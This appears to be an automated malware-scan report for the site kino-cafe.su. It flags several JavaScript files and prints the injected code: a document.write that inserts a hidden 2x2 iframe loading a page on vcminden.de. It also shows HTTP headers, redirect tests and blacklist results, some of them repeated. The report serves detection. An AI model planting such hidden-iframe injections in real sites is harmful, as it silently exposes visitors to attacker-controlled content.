Scanned pages/files
Request | Server response | Status |
http://kino-cafe.su/ | 200 OK Content-Length: 12633 Content-Type: text/html | clean |
http://kino-cafe.su/include/ac.js | 200 OK Content-Length: 16424 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281></iframe>');
var article_id; var article_search; var main_url; function changed_category(){ if (article_search!=null) { article_search.close_popup(); if (document.getElementById('article_search').value!="") { article_search.send(document.getElementById('article_search').value); for (i = 1; i < arguments.length; i += 2) { var index=arguments[i+1].indexOf(this.searched_term); var name = this.highlight ? arguments[i+1].replace(re, nt) : arguments[i+1]; var value = this.highlight ? arguments[i].replace(re, nt) : arguments[i]; var html = "<span class='a'>"+name+"</span>"; results[c] = new Array(arguments[i+1], arguments[i], c, html); c++; } this.update_popup(results); } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/include/functions.js | 200 OK Content-Length: 1207 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281></iframe>');
var tgs = new Array( 'div','td','tr','a'); var szs = new Array( '7pt','8pt','9pt','10pt','11pt','12pt','13pt' ); var startSz = 1; function ts( trgt,inc ) { if (!document.getElementById) return var d = document,cEl = null,sz = startSz,i,j,cTags; sz += inc; if ( sz < 0 ) sz = 0; } } function tsz( trgt,sz ) { if (!document.getElementById) return var d = document,cEl = null,i,j,cTags; if ( !( cEl = d.getElementById( trgt ) ) ) cEl = d.getElementsByTagName( trgt )[ 0 ]; cEl.style.fontSize = sz; for ( i = 0 ; i < tgs.length ; i++ ) { cTags = cEl.getElementsByTagName( tgs[ i ] ); for ( j = 0 ; j < cTags.length ; j++ ) cTags[ j ].style.fontSize = sz; } } Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/include/DropDownMenuX.js | 200 OK Content-Length: 36527 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/include/ajax.js | 200 OK Content-Length: 8423 Content-Type: application/javascript | suspicious |
Hidden iFrame found. size: 2x2 src: http://vcminden.de/mzmd.html?j=1002281 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://vcminden.de/mzmd.html?j=1002281> | ||
http://kino-cafe.su/plugins/vbm/admin/show.php?show_zone=2 | 200 OK Content-Length: 139 Content-Type: text/html | clean |
http://kino-cafe.su/plugins/vbm/click.php?id=1 | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
http://kino-cafe.su/test404page.js | 404 Not Found Content-Length: 1 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: kino-cafe.su
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Mon, 21 Apr 2014 00:16:03 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 12633
Content-Type: text/html;charset=windows-1251
Expires: Tue, 22 Apr 2014 00:00:00 GMT
Last-Modified: Sat, 19 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...12633 bytes of data.
GET / HTTP/1.1
Host: kino-cafe.su
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Mon, 21 Apr 2014 00:16:03 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 12633
Content-Type: text/html;charset=windows-1251
Expires: Tue, 22 Apr 2014 00:00:00 GMT
Last-Modified: Sat, 19 Apr 2014 00:00:00 GMT
X-Powered-By: PHP/5.2.17
...12633 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: kino-cafe.su
Referer: http://www.google.com/search?q=kino-cafe.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: kino-cafe.su
Referer: http://www.google.com/search?q=kino-cafe.su
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kino-cafe.su
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kino-cafe.su/
Result: kino-cafe.su is not infected or malware details are not published yet.
Result: kino-cafe.su is not infected or malware details are not published yet.